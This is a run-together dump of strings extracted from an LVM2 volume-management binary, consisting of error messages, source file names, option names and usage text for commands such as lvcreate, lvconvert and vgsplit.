supplied to shift_mirror_images()Aborting. Unable to create in-sync mirror log while activation is disabled.Aborting. Unable to deactivate mirror log.Aborting. Unable to tag mirror log.Aborting. Failed to activate mirror log.Failed to remove tag %s from mirror log.Aborting. Failed to wipe mirror log.Name allocation failed - log header not written (%s)Name too long - log header not written (%s)Writing log header to device, %s%s: not found: log header not writtenFailed to write log header to %sAborting. Failed to write mirror log header.Aborting. Failed to deactivate mirror log. Manual intervention required.Unable to deactivate mirror log LV. Manual intervention required.Manual intervention may be required to remove abandoned log LV before retrying.Manual intervention may be required to remove/restore abandoned log LV before retrying.log_count != 1 is not supported.mirror log name allocation failedFailed to initialise mirror log.img_name allocation failed. Remove new LV and retry.Aborting. Failed to create mirror image LV. Remove new LV and retry.Aborting. Failed to add mirror image segment to %s. Remove new LV and retry.Unable to determine mirror sync status of %s/%s.Unable to allocate extents for mirror(s).Aborting. Failed to add mirror segment. Remove new LV and retry.log_count > 1 is not supportedMultiple-segment mirror is not supportedUnable to convert the log of inactive cluster mirror %s%s: Required device-mapper target(s) not detected in your kernelUnable to allocate extents for mirror log.Segment is not mirrored: %s:%uSegment status does not match: %s:%u status:0x%x/0x%xIntermediate VG commit for orphan volume failed.activation/mirror_image_fault_policyBad activation/mirror_log_fault_policyBad activation/mirror_device_fault_policyReducing mirror set from %u to %u image(s)%s.Incompatible parameters to _remove_mirror_imagesProblem suspending temporary LV %sProblem resuming temporary LV, %sFailed to initialize log deviceWARNING: Bad device removed from mirror volume, %s/%sWARNING: Failed to replace mirror device in %s/%sWARNING: Use 'lvconvert -m %d %s/%s --corelog' to replace failed devicesWARNING: Use 'lvconvert -m %d %s/%s' to replace failed devicesWARNING: Failed to replace mirror log device in %s/%sWARNING: Unable to find substitute device for mirror volume, %s/%sWARNING: Mirror volume, %s/%s restored - substitute for failed device found.WARNING: Mirror volume, %s/%s converted to linear due to device failure.WARNING: Mirror volume, %s/%s disk log removed due to device failure.No mirror images found using specified PVs.%u images are removed out of requested %u.Removing more than existing: %d <= %dPersistent log is not supported on segment-by-segment mirroringUnable to determine mirror sync status.Unable to convert the log of an inactive cluster mirror, %sFull resync required to convert inactive mirror %s to core log. Proceed? [y/n]: Using reduced mirror region size of %u sectorsUnable to allocate mirror extents for %s.Failed to add mirror areas to %sStriped-mirroring is not supported on segment-by-segment mirroringUnsupported mirror conversion typeFailed to find mirror_seg for %s%s on %s is not a mirror segmentsFailed to find mirrored LV for %sNot collapsing %s: out-of-syncFailed to release mirror imagesmetadata/mirror.clog_name allocation failed._mlogtmp_%d_mlogFailed to create mirror log.%s_mimage_%%dstripes > 1 is not supported_mimage_%dlvs list alloc failedAborting. Unable to tag.allocateallocate_anywhere and no log volumeFailed to add mirror imagesAll mimages of %s are goneintermediate VG write failed.Failed to lock %sUpdating "%s" in kernelProblem reactivating %s%u image(s) removed from %sNo conversion is requestedNot a mirror segment%s %u: %6u %6u: %s(%u:%u)metadata/pv_manip.cGap in pvsegs: %u, %uWrong lvseg area typeInconsistent pvseg pointersInconsistent length: %u %upv_segment allocation failedPV segment pe_count mismatch: %u != %uPV segment pe_alloc_count mismatch: %u != %uPV segment VG pv_count mismatch: %u != %uPV segment VG free_count mismatch: %u != %uPV segment VG extent_count mismatch: %u != %uSegment with extent %u in PV %s not foundNo change to size of physical volume %s.Resizing physical volume %s from %u to %u extents.%s: cannot resize to %u extents as there is only room for %llu.%s: cannot resize to %u extents as %u are allocated.%s: cannot resize to %u extents as later ones are allocated.release_pv_segment with unallocated segment: %s PE %uMissing PV segment on %s at %u.metadata/pv_map.cto_go <= pva->countcreate_pv_maps alloc failedpvl->pv->devAllowing allocation on %s start PE %u length %uCouldn't create physical volume maps in %sconsume_pv_area_create_mapsmetadata/segtype.cWARNING: Unrecognised segment type %sFailed to remove internal snapshot LV %s'%s' is already in use as a snapshot.Snapshot and origin LVs must differ.metadata/snapshot_manip.csnapshot%dd n;0&AvQkkXaM %ssymlinkCreating directory %smkdirRemoving directory %sCouldn't determine link pathname.The link %s should have been removed by udev but it is still present. Falling back to direct link removal.%s not symbolic link - not removingCouldn't create path for volume group dir %sCouldn't create source pathname for logical volume link %sCouldn't create destination pathname for logical volume link for %sCouldn't create pathname for LVM1 group file for %sNon-LVM1 character device found at %sSymbolic link %s not created: file existsSymlink %s that should have been created by udev does not have correct target. Falling back to direct link creationSymlink %s that should have been created by udev could not be checked for its correctness. Falling back to direct link creation.The link %s should had been created by udev but it was not found. Falling back to direct link creation.Couldn't construct name of volume group directory.No space to stack fs operationExternal locking already initialisedShared library %s does not contain locking functionsWARNING: %s: _query_resource() missing: Using inferior activation method.Loaded external locking library %slocking/external_locking.cliblvm2clusterlock.soglobal/locking_librarylocking_initlock_resourcereset_lockinglocking_endquery_resourceglobal/library_dirmisc/sharedlib.cOpening shared %s library %sNot loading shared %s library %s in static mode.Unable to open external %s library %s: %sdumpconfig.cNeed 1 or more of -a, -C, -j, -m, -M, -p, -r, --resync, --refresh, --alloc, --addtag, --deltag or --monitorOnly -a permitted with --ignorelockingfailurePlease give logical volume path(s)--major and --minor require -MyOnly give one logical volume when specifying minorOnly one of --alloc and --contiguous permittedMinor number is already not persistent for "%s"Disabling persistent device number for "%s"Minor number must be specified with -MyMajor number must be specified with -MyLogical volume %s will be deactivated temporarily. Continue? [y/n]: Setting persistent device number to (%d, %d) for "%s"Updating logical volume "%s" on disk(s)Re-activating logical volume "%s"Logical volume %s/%s does not support tagsFailed to remove tag %s from %s/%sUnable to resync %s because it is not mirrored.Unable to resync pvmove volume %sUnable to resync locked volume %sCan't resync open logical volume "%s"Do you really want to deactivate logical volume %s to resync it? [y/n]: Logical volume "%s" not resyncedUnable to deactivate %s for resyncCan't get exclusive access to clustered volume %sStarting resync of %s%s%s mirror "%s"Failed to reactivate %s to resynchronize mirrorFailed to write intermediate VG metadata.Failed to commit intermediate VG metadata.Unable to activate %s for mirror log resyncUnable to reset sync status for %sFailed to deactivate log LV after wiping failedUnable to deactivate log LV %s after wiping for resyncFailed to update metadata on disk.Failed to reactivate %s after resyncDeactivating logical volume "%s" locallyDeactivating logical volume "%s"Activating logical volume "%s" exclusivelyActivating logical volume "%s" locallyActivating logical volume "%s"Only -a permitted with read-only volume group "%s"Can't change logical volume "%s" under snapshotCan't change snapshot logical volume "%s"Use 'pvmove --abort' to abandon a pvmoveUnable to change mirror log LV %s directlyUnable to change mirror image LV %s directlyUnable to change internal LV %s directlyLogical volume "%s" is already writableLogical volume "%s" is already read onlyCannot change permissions of mirror "%s" while active.Setting logical volume "%s" read/writeSetting logical volume "%s" read-onlyUpdating permissions for "%s" in kernelAllocation policy of logical volume "%s" is already %sSetting contiguous allocation policy for "%s" to %sWARNING: Overriding readahead to %u sectors, a multiple of %uK page size.Read ahead is already auto for "%s"Read ahead is already %u for "%s"Setting read ahead to %u for "%s"Refreshing logical volume "%s" (if active)Logical volume, %s, is not activelvchange.c%s device number not changed.Ensuring %s is inactive.%s: deactivation failed%s: reactivation failedFailed to get tagcore-loggeddisk-loggedClearing log device %sUnable to change pvmove LV %sLogical volume "%s" changedlvconvert.c_mimagetmp_%dlayer name allocation failed.Failed to insert resync layerCannot convert locked LV %slockedpvmovemirroredCouldn't deactivate LV %s.coreUnknown mirrorlog type: %sSetting logging type to %sLogical volume %s converted.Convertedlvconvert: layer name allocation failed.lvconvert: layer name generation failed.%d missing and now unallocated Physical Volumes removed from VG.Can't convert logical volume "%s" under snapshotCan't convert snapshot logical volume "%s"Unable to convert pvmove LV %sCan't repair non-mirrored LV "%s".Unable to convert mirrored LV "%s" into a snapshot.Unable to use "%s" as both snapshot and origin.Unable to create a snapshot of a %s LV.Aborting. Failed to wipe snapshot exception store.Logical volume %s converted to snapshot.You may only use one of --mirrors and --repair.The mirror is consistent. Nothing to repair.Mirror status: %d of %d images failed.Allocation of list of failed_pvs failed.Allocation of failed_pvs list entry failed.Logical volume %s only has %u mirrors.--mirrorlog disk and --corelog are incompatibleMirror log region size cannot be changed on an existing mirror.Logical volume %s has multiple mirror segments.Attempt to replace failed mirror log? [y/n]: Attempt to replace failed mirror images (requires full device resync)? [y/n]: Logical volume %s is already not mirrored.Mirrors of striped volumes are not yet supported.Can't add mirror to out-of-sync mirrored LV: use lvchange --resync first.Can't add additional mirror images to mirrors that are under snapshotsABORTING: Failed to remove temporary mirror layer %s.Manual cleanup with vgcfgrestore and dmsetup may be required.Logical volume %s already has %u mirror(s).--snapshot argument cannot be mixed with --mirrors, --repair or --log--regionsize is only available with mirrorsNegative chunk size is invalidChunk size must be a power of 2 in the range 4K to 512KSetting chunksize to %d sectors.--chunksize is only available with snapshots--zero is only available with snapshotsNegative regionsize is invalidNegative regionsize in configuration file is invalidRegion size (%u) must be a multiple of machine memory page size (%d)Region size (%u) must be a power of 2Non-zero region size must be supplied.Please specify a logical volume to act as the snapshot origin.The origin name should include the volume group.Please provide logical volume pathPlease use a single volume group name ("%s" or "%s")Please provide a valid volume group nameChecking for existing volume group "%s"Logical volume "%s" not found in volume group "%s"Conversion starts after activationFailed to remove temporary sync layer.lvcreate.cNegative size is invalidmetadata/stripesizeUsing default stripesize %sInvalid stripe size %sFinding volume group "%s"Redundant stripes argument: default is 1Redundant mirrors argument: default is 0Mirrors argument may not be negative-Z is incompatible with snapshots-c is only available with snapshotsmirrors and snapshots are currently incompatiblemirrors and stripes are currently incompatible--corelog is only available with mirrors--nosync is only available with mirrorsPlease provide a volume group nameVolume group name expected (no slash)Inconsistent volume group names given: "%s" and "%s"Logical volume name "%s" is invalidPlease specify either size or extents (not both)Negative number of extents is invalidNegative virtual origin size is invalidVirtual origin size may not be zeroNegative stripesize is invalidStripe size cannot be larger than %sIgnoring stripesize argument with single stripeNumber of stripes (%d) must be between %d and %dConflicting contiguous and alloc argumentsOnly up to 8 leg mirrors supported currently.Please specify minor number with --minor when using -MyPlease specify major number with --major when using -My--major and --minor incompatible with -MnPlease express size as %%VG, %%PVS, or %%FREE.Incompatible options selectedlvdisplay.cOptions -v and -c are incompatibleWith LVM2 and the device mapper, this program is obsolete.lvmchange.crwwreyyelnnlylAvailable lvm commands:lvmcmdline.c%-16.16s%sstub.hCommand not implemented yet.LVM version: %sLibrary version: %sDriver version: %sCouldn't allocate memory.Out of memory.Dump active configurationdumpconfigformats formatshelp Display help for commandslvchangeChange logical volume layoutlvconvertCreate a logical volumelvcreatelvdisplayAdd space to a logical volumelvextendlvmchangelvmdiskscanCollect activity datalvmsadcCreate activity reportlvmsarlvreducelvremoveRename a logical volumelvrenameResize a logical volumelvresizelvslvscanpvchangeResize physical volume(s)pvresizepvckpvcreatepvdatapvdisplaypvremovepvsList all physical volumespvscansegtypes List available segment typesvgcfgbackupvgcfgrestorevgchangevgckvgconvertCreate a volume groupvgcreatevgdisplayvgexportvgextendvgimportMerge volume groupsvgmergevgmknodesvgreduceRemove volume group(s)vgremoveRename a volume groupvgrenamevgsSearch for all volume groupsvgscanvgsplitversion PVPVSFFR%s: no such command.%s: %s %sCouldn't copy command line.Parsing: %s -Option requires argument.Invalid argument %sCompleted: %sUnrecognised option.Processing: %sO_DIRECT will be usedlvm.staticinitrd-lvm/proc/%u/cmdlineLVM_SUPPRESS_FD_WARNINGS/proc/self/fd/%u Parent PID %d: %s /usr/sbin/lvmLVM_DID_EXECglobal/fallback_to_lvm1%s.lvm1Please supply an LVM command.Too many arguments: %squitexitNo such command. Try 'help'.--version--quiet--setphysicalvolumesize--ignorelockingfailure--nolocking--pvmetadatacopies--metadatacopies--metadatasize--restorefile--labelsector--driverloaded--aligned--unbuffered--noheadings--segments--units--nosuffix--removemissing--abort--addtag--deltag--refresh--mknodes--minor--type--alloc--separator--mirrorsonly--nosync--resync--corelog--mirrorlog--repair--use-policies--monitor--config--trustcache--ignoremonitoring--nameprefixes--unquoted--rows--dataalignment--dataalignmentoffset--virtualoriginsize--virtualsize--noudevsync--resizable--allocation--available--all--autobackup--activevolumegroups--background--blockdevice--chunksize--clustered--colon--columns--contiguous--debug--exported--physicalextent--file--force--full--help--stripesize--stripes--interval--iop_version--logicalvolume--maxlogicalvolumes--extents--lvmpartition--list--size--logicalextent--persistent--major--mirrors--metadatatype--maps--name--oldpath--nofsck--novolumegroup--options--sort--permission--maxphysicalvolumes--partial--physicalvolume--readahead--resizefs--reset--regionsize--physicalextentsize--stdin--snapshot--short--test--uuid--uuidlist--verbose--volumegroup--allocatable--resizeable--yes--zerokmgtpebsUse 'lvm help ' for more information%s and %s are synonyms. Please only supply one.There's no 'pvdata' command in LVM2.Use lvs, pvs, vgs instead; or use vgcfgbackup and read the text file backup.Metadata in LVM1 format can still be displayed using LVM1's pvdata command.WARNING: Running as a non-root user. Functionality may be unavailable.dumpconfig [-f|--file filename] [ConfigurationVariable...] List available metadata formatslvchange [-A|--autobackup y|n] [-a|--available [e|l]y|n] [--addtag Tag] [--alloc AllocationPolicy] [-C|--contiguous y|n] [-d|--debug] [--deltag Tag] [-f|--force] [-h|--help] [--ignorelockingfailure] [--ignoremonitoring] [--monitor {y|n}] [--noudevsync] [-M|--persistent y|n] [--major major] [--minor minor] [-P|--partial] [-p|--permission r|rw] [-r|--readahead ReadAheadSectors|auto|none] [--refresh] [--resync] [-t|--test] [-v|--verbose] [-y|--yes] [--version] LogicalVolume[Path] [LogicalVolume[Path]...] Change the attributes of logical volume(s)lvconvert [-m|--mirrors Mirrors [{--mirrorlog {disk|core}|--corelog}]] [--repair [--use-policies]] [-R|--regionsize MirrorLogRegionSize] [--alloc AllocationPolicy] [-b|--background] [-d|--debug] [-f|--force] [-h|-?|--help] [-i|--interval seconds] [--noudevsync] [-v|--verbose] [-y|--yes] [--version] LogicalVolume[Path] [PhysicalVolume[Path]...] lvconvert [-s|--snapshot] [-c|--chunksize] [-d|--debug] [-h|-?|--help] [--noudevsync] [-v|--verbose] [-Z|--zero {y|n}] [--version] OriginalLogicalVolume[Path] SnapshotLogicalVolume[Path] lvcreate [-A|--autobackup {y|n}] [--addtag Tag] [--alloc AllocationPolicy] [-C|--contiguous {y|n}] [-d|--debug] [-h|-?|--help] [-i|--stripes Stripes [-I|--stripesize StripeSize]] {-l|--extents LogicalExtentsNumber | -L|--size LogicalVolumeSize[bBsSkKmMgGtTpPeE]} [-M|--persistent {y|n}] [--major major] [--minor minor] [-m|--mirrors Mirrors [--nosync] [{--mirrorlog {disk|core}|--corelog}]] [-n|--name LogicalVolumeName] [--noudevsync] [-p|--permission {r|rw}] [-r|--readahead ReadAheadSectors|auto|none] [-R|--regionsize MirrorLogRegionSize] [-t|--test] [--type VolumeType] [-v|--verbose] [-Z|--zero {y|n}] [--version] VolumeGroupName [PhysicalVolumePath...] lvcreate { {-s|--snapshot} OriginalLogicalVolume[Path] | [-s|--snapshot] VolumeGroupName[Path] --virtualsize VirtualSize} [-c|--chunksize] [-A|--autobackup {y|n}] [--addtag Tag] [--alloc AllocationPolicy] [-C|--contiguous {y|n}] [-d|--debug] [-h|-?|--help] [-i|--stripes Stripes [-I|--stripesize StripeSize]] {-l|--extents LogicalExtentsNumber[%{VG|LV|PVS|FREE}] | -L|--size LogicalVolumeSize[bBsSkKmMgGtTpPeE]} [-M|--persistent {y|n}] [--major major] [--minor minor] [-n|--name LogicalVolumeName] [--noudevsync] [-p|--permission {r|rw}] [-r|--readahead ReadAheadSectors|auto|none] [-t|--test] [-v|--verbose] [--version] [PhysicalVolumePath...] lvdisplay [-a|--all] [-c|--colon] [-d|--debug] [-h|--help] [--ignorelockingfailure] [-m|--maps] [--nosuffix] [-P|--partial] [--units hHbBsSkKmMgGtTpPeE] [-v|--verbose] [--version] [LogicalVolume[Path] [LogicalVolume[Path]...]] lvdisplay --columns|-C [--aligned] [-a|--all] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [-P|--partial] [--segments] [--separator Separator] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [-v|--verbose] [--version] [LogicalVolume[Path] [LogicalVolume[Path]...]] Display information about a logical volumelvextend [-A|--autobackup y|n] [--alloc AllocationPolicy] [-d|--debug] [-f|--force] [-h|--help] [-i|--stripes Stripes [-I|--stripesize StripeSize]] {-l|--extents [+]LogicalExtentsNumber[%{VG|PVS|FREE}] | -L|--size [+]LogicalVolumeSize[bBsSkKmMgGtTpPeE]} [-m|--mirrors Mirrors] [-n|--nofsck] [--noudevsync] [-r|--resizefs] [-t|--test] [--type VolumeType] [-v|--verbose] [--version] LogicalVolume[Path] [ PhysicalVolumePath... ] lvmchange [-d|--debug] [-h|--help] [-R|--reset] [-v|--verbose] [--version] With the device mapper, this is obsolete and does nothing.lvmdiskscan [-d|--debug] [-h|--help] [-l|--lvmpartition] [--version] List devices that may be used as physical volumeslvmsadc [-d|--debug] [-h|--help] [-v|--verbose] [--version] [LogFilePath] lvmsar [-d|--debug] [-f|--full] [-h|--help] [-s|--stdin] [-v|--verbose] [--version] LogFilePath lvreduce [-A|--autobackup y|n] [-d|--debug] [-f|--force] [-h|--help] {-l|--extents [-]LogicalExtentsNumber[%{VG|LV|FREE}] | -L|--size [-]LogicalVolumeSize[bBsSkKmMgGtTpPeE]} [-n|--nofsck] [--noudevsync] [-r|--resizefs] [-t|--test] [-v|--verbose] [-y|--yes] [--version] LogicalVolume[Path] Reduce the size of a logical volumelvremove [-A|--autobackup y|n] [-d|--debug] [-f|--force] [-h|--help] [--noudevsync] [-t|--test] [-v|--verbose] [--version] LogicalVolume[Path] [LogicalVolume[Path]...] Remove logical volume(s) from the systemlvrename [-A|--autobackup {y|n}] [-d|--debug] [-h|-?|--help] [--noudevsync] [-t|--test] [-v|--verbose] [--version] { OldLogicalVolumePath NewLogicalVolumePath | VolumeGroupName OldLogicalVolumeName NewLogicalVolumeName } lvresize [-A|--autobackup y|n] [--alloc AllocationPolicy] [-d|--debug] [-f|--force] [-h|--help] [-i|--stripes Stripes [-I|--stripesize StripeSize]] {-l|--extents [+|-]LogicalExtentsNumber[%{VG|LV|PVS|FREE}] | -L|--size [+|-]LogicalVolumeSize[bBsSkKmMgGtTpPeE]} [-n|--nofsck] [--noudevsync] [-r|--resizefs] [-t|--test] [--type VolumeType] [-v|--verbose] [--version] LogicalVolume[Path] [ PhysicalVolumePath... ] lvs [-a|--all] [--aligned] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--nameprefixes] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [-P|--partial] [--rows] [--segments] [--separator Separator] [--trustcache] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [--unquoted] [-v|--verbose] [--version] [LogicalVolume[Path] [LogicalVolume[Path]...]] Display information about logical volumeslvscan [-a|--all] [-b|--blockdevice] [-d|--debug] [-h|-?|--help] [--ignorelockingfailure] [-P|--partial] [-v|--verbose] [--version] List all logical volumes in all volume groupspvchange [-a|--all] [-A|--autobackup y|n] [-d|--debug] [-h|--help] [-t|--test] [-u|--uuid] [-x|--allocatable y|n] [-v|--verbose] [--addtag Tag] [--deltag Tag] [--version] [PhysicalVolumePath...] Change attributes of physical volume(s)pvresize [-d|--debug] [-h|-?|--help] [--setphysicalvolumesize PhysicalVolumeSize[bBsSkKmMgGtTpPeE] [-t|--test] [-v|--verbose] [--version] PhysicalVolume [PhysicalVolume...] pvck [-d|--debug] [-h|--help] [--labelsector sector] [-v|--verbose] [--version] PhysicalVolume [PhysicalVolume...] Check the consistency of physical volume(s)pvcreate [--restorefile file] [-d|--debug] [-f[f]|--force [--force]] [-h|-?|--help] [--labelsector sector] [-M|--metadatatype 1|2] [--pvmetadatacopies #copies] [--metadatasize MetadataSize[bBsSkKmMgGtTpPeE]] [--dataalignment Alignment[bBsSkKmMgGtTpPeE]] [--dataalignmentoffset AlignmentOffset[bBsSkKmMgGtTpPeE]] [--setphysicalvolumesize PhysicalVolumeSize[bBsSkKmMgGtTpPeE] [-t|--test] [-u|--uuid uuid] [-v|--verbose] [-y|--yes] [-Z|--zero {y|n}] [--version] PhysicalVolume [PhysicalVolume...] Initialize physical volume(s) for use by LVMpvdata [-a|--all] [-d|--debug] [-E|--physicalextent] [-h|-?|--help] [-L|--logicalvolume] [-P[P]|--physicalvolume [--physicalvolume]] [-U|--uuidlist] [-v[v]|--verbose [--verbose]] [-V|--volumegroup] [--version] PhysicalVolume [PhysicalVolume...] Display the on-disk metadata for physical volume(s)pvdisplay [-c|--colon] [-d|--debug] [-h|--help] [--ignorelockingfailure] [-m|--maps] [--nosuffix] [-s|--short] [--units hHbBsSkKmMgGtTpPeE] [-v|--verbose] [--version] [PhysicalVolumePath [PhysicalVolumePath...]] pvdisplay --columns|-C [--aligned] [-a|--all] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [--separator Separator] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [-v|--verbose] [--version] [PhysicalVolumePath [PhysicalVolumePath...]] Display various attributes of physical volume(s)pvmove [--abort] [-A|--autobackup {y|n}] [--alloc AllocationPolicy] [-b|--background] [-d|--debug] [-h|-?|--help] [-i|--interval seconds] [--noudevsync] [-t|--test] [-v|--verbose] [--version] [{-n|--name} LogicalVolume] SourcePhysicalVolume[:PhysicalExtent[-PhysicalExtent]...]} [DestinationPhysicalVolume[:PhysicalExtent[-PhysicalExtent]...]...] Move extents from one physical volume to anotherpvremove [-d|--debug] [-f[f]|--force [--force]] [-h|-?|--help] [-t|--test] [-v|--verbose] [-y|--yes] [--version] PhysicalVolume [PhysicalVolume...] Remove LVM label(s) from physical volume(s)pvs [-a|--all] [--aligned] [-d|--debug] [-h|-?|--help] [--ignorelockingfailure] [--nameprefixes] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [-P|--partial] [--rows] [--segments] [--separator Separator] [--trustcache] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [--unquoted] [-v|--verbose] [--version] [PhysicalVolume [PhysicalVolume...]] Display information about physical volumespvscan [-d|--debug] {-e|--exported | -n|--novolumegroup} [-h|-?|--help] [--ignorelockingfailure] [-P|--partial] [-s|--short] [-u|--uuid] [-v|--verbose] [--version] vgcfgbackup [-d|--debug] [-f|--file filename] [-h|-?|--help] [--ignorelockingfailure] [-P|--partial] [-v|--verbose] [--version] [VolumeGroupName...] Backup volume group configuration(s)vgcfgrestore [-d|--debug] [-f|--file filename] [-l[l]|--list [--list]] [-M|--metadatatype 1|2] [-n|--name VolumeGroupName] [-h|--help] [-t|--test] [-v|--verbose] [--version] VolumeGroupNameRestore volume group configurationvgchange [-A|--autobackup {y|n}] [--alloc AllocationPolicy] [-P|--partial] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--ignoremonitoring] [--monitor {y|n}] [--noudevsync] [--refresh] [-t|--test] [-u|--uuid] [-v|--verbose] [--version] {-a|--available [e|l]{y|n} | -c|--clustered {y|n} | -x|--resizeable {y|n} | -l|--logicalvolume MaxLogicalVolumes | -p|--maxphysicalvolumes MaxPhysicalVolumes | -s|--physicalextentsize PhysicalExtentSize[bBsSkKmMgGtTpPeE] | --addtag Tag | --deltag Tag} [VolumeGroupName...] Change volume group attributesvgck [-d|--debug] [-h|--help] [-v|--verbose] [--version] [VolumeGroupName...] Check the consistency of volume group(s)vgconvert [-d|--debug] [-h|--help] [--labelsector sector] [-M|--metadatatype 1|2] [--pvmetadatacopies #copies] [--metadatasize MetadataSize[bBsSkKmMgGtTpPeE]] [-t|--test] [-v|--verbose] [--version] VolumeGroupName [VolumeGroupName...] Change volume group metadata formatvgcreate [-A|--autobackup {y|n}] [--addtag Tag] [--alloc AllocationPolicy] [-c|--clustered {y|n}] [-d|--debug] [-h|--help] [-l|--maxlogicalvolumes MaxLogicalVolumes] [-M|--metadatatype 1|2] [-p|--maxphysicalvolumes MaxPhysicalVolumes] [-s|--physicalextentsize PhysicalExtentSize[bBsSkKmMgGtTpPeE]] [-t|--test] [-v|--verbose] [--version] [ PHYSICAL DEVICE OPTIONS ] VolumeGroupName PhysicalDevicePath [PhysicalDevicePath...] vgdisplay [-A|--activevolumegroups] [-c|--colon | -s|--short | -v|--verbose] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--nosuffix] [-P|--partial] [--units hHbBsSkKmMgGtTpPeE] [--version] [VolumeGroupName [VolumeGroupName...]] vgdisplay --columns|-C [--aligned] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [-P|--partial] [--separator Separator] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [--verbose] [--version] [VolumeGroupName [VolumeGroupName...]] Display volume group informationvgexport [-a|--all] [-d|--debug] [-h|--help] [-v|--verbose] [--version] VolumeGroupName [VolumeGroupName...] Unregister volume group(s) from the systemvgextend [-A|--autobackup y|n] [-d|--debug] [-h|--help] [-t|--test] [-v|--verbose] [--version] [ PHYSICAL DEVICE OPTIONS ] VolumeGroupName PhysicalDevicePath [PhysicalDevicePath...] Add physical volumes to a volume groupvgimport [-a|--all] [-d|--debug] [-f|--force] [-h|--help] [-t|--test] [-v|--verbose] [--version] VolumeGroupName... Register exported volume group with systemvgmerge [-A|--autobackup y|n] [-d|--debug] [-h|--help] [-l|--list] [-t|--test] [-v|--verbose] [--version] DestinationVolumeGroupName SourceVolumeGroupName vgmknodes [-d|--debug] [-h|--help] [--ignorelockingfailure] [--refresh] [-v|--verbose] [--version] [VolumeGroupName...] Create the special files for volume group devices in /devvgreduce [-a|--all] [-A|--autobackup y|n] [-d|--debug] [-h|--help] [--mirrorsonly] [--removemissing] [-f|--force] [-t|--test] [-v|--verbose] [--version] VolumeGroupName [PhysicalVolumePath...] Remove physical volume(s) from a volume groupvgremove [-d|--debug] [-f|--force] [-h|--help] [--noudevsync] [-t|--test] [-v|--verbose] [--version] VolumeGroupName [VolumeGroupName...] vgrename [-A|--autobackup y|n] [-d|--debug] [-h|--help] [-t|--test] [-v|--verbose] [--version] OldVolumeGroupPath NewVolumeGroupPath | OldVolumeGroupName NewVolumeGroupName vgs [--aligned] [-a|--all] [-d|--debug] [-h|--help] [--ignorelockingfailure] [--nameprefixes] [--noheadings] [--nosuffix] [-o|--options [+]Field[,Field]] [-O|--sort [+|-]key1[,[+|-]key2[,...]]] [-P|--partial] [--rows] [--separator Separator] [--trustcache] [--unbuffered] [--units hHbBsSkKmMgGtTpPeE] [--unquoted] [-v|--verbose] [--version] [VolumeGroupName [VolumeGroupName...]] Display information about volume groupsvgscan [-d|--debug] [-h|--help] [--ignorelockingfailure] [--mknodes] [-P|--partial] [-v|--verbose] [--version] vgsplit [-A|--autobackup {y|n}] [--alloc AllocationPolicy] [-c|--clustered {y|n}] [-d|--debug] [-h|--help] [-l|--maxlogicalvolumes MaxLogicalVolumes] [-M|--metadatatype 1|2] [-n|--name LogicalVolumeName] [-p|--maxphysicalvolumes MaxPhysicalVolumes] [-t|--test] [-v|--verbose] [--version] SourceVolumeGroupName DestinationVolumeGroupName [PhysicalVolumePath...] Move physical volumes into a new or existing volume groupDisplay software and driver version informationSize is not a multiple of 512. Try using %llu or %llu.Major number outside range 0-255Minor number outside range 0-255Option%s%c%s%s may not be repeatedError during parsing of command line.Updated config file invalid. Aborting.Partial mode. Incomplete volume groups will be activated read-only.--trustcache is incompatible with --allWARNING: Cache file of PVs will be trusted. New devices holding PVs may get ignored.Locking type %d initialisation failed.Test mode: Wiping internal cacheRun `%s --help' for more information.getrlimit(RLIMIT_NOFILE) failed: %s File descriptor %d (%s) leaked on %s invocation.Close failed on stray file descriptor %d (%s): %sFalling back to LVM1 tools, but no command specified.Failed to create LVM1 tool pathnameLine too long (max 255) beginning: %sInternal error: Failed command did not use log_errorCommand failed with status code %d.;%-*s [%15s] %slvmdiskscan.cdev_iter_create failedCouldn't get size of "%s"LVM physical volumedev_close on "%s" failed%d disk%s%d partition%s%d LVM physical volume%sWARNING: only considering LVM devices%d LVM physical volume whole disk%sPlease enter one or more logical volume pathslvremove.cOld and new logical volume names requiredLogical volume names must have the same volume group ("%s" or "%s")New logical volume path exceeds maximum length of %zu!New logical volume name may not be blankNew logical volume name "%s" is invalidOld and new logical volume names must differExisting logical volume "%s" not found in volume group "%s"Renamed "%s" to "%s" in volume group "%s"lvrename.cfsadm--dry-runchecklvresize.c%lluKFinding volume group %sCan't resize locked LV %sNew size of 0 not permittedExtending %u mirror images.lv_info failed: aborting and openLogical volume %s NOT reducedReducExtend%sing logical volume %s to %sCouldn't create LV path for %sCouldn't generate new LV size stringPlease specify either size or extents but not both.Negative argument not permitted - use lvreducePositive sign not permitted - use lvextendPlease provide the logical volume nameLogical volume %s not found in volume group %sVaried striping not supported. Ignoring.Mirrors not supported. Ignoring.Stripesize may not be negative.Varied stripesize not supported. Ignoring.Reducing stripe size %s to maximum, physical extent size %sMirrors and striping cannot be combined yet.Stripe size must be power of 2Can't resize %s while lvconvert in progressUnable to reduce %s below 1 extentNew size (%d extents) matches existing size (%d extents)VolumeType does not match (%s)Please specify number of stripes (-i) and stripesize (-I)Using stripesize of last segment %sCannot vary number of mirrors in LV yet.Ignoring stripes, stripesize and mirrors arguments when reducingStripesize for striped segment should not be 0!Rounding size (%d extents) down to stripe boundary size for segment (%d extents)New size given (%d extents) not larger than existing size (%d extents)New size given (%d extents) not less than existing size (%d extents)Snapshot origin volumes cannot be reduced in size yet.Snapshot origin volumes can be resized only while inactive: try lvchange -anIgnoring PVs on command line when reducingLogical volume %s must be activated before resizing filesystemWARNING: Reducing active%s 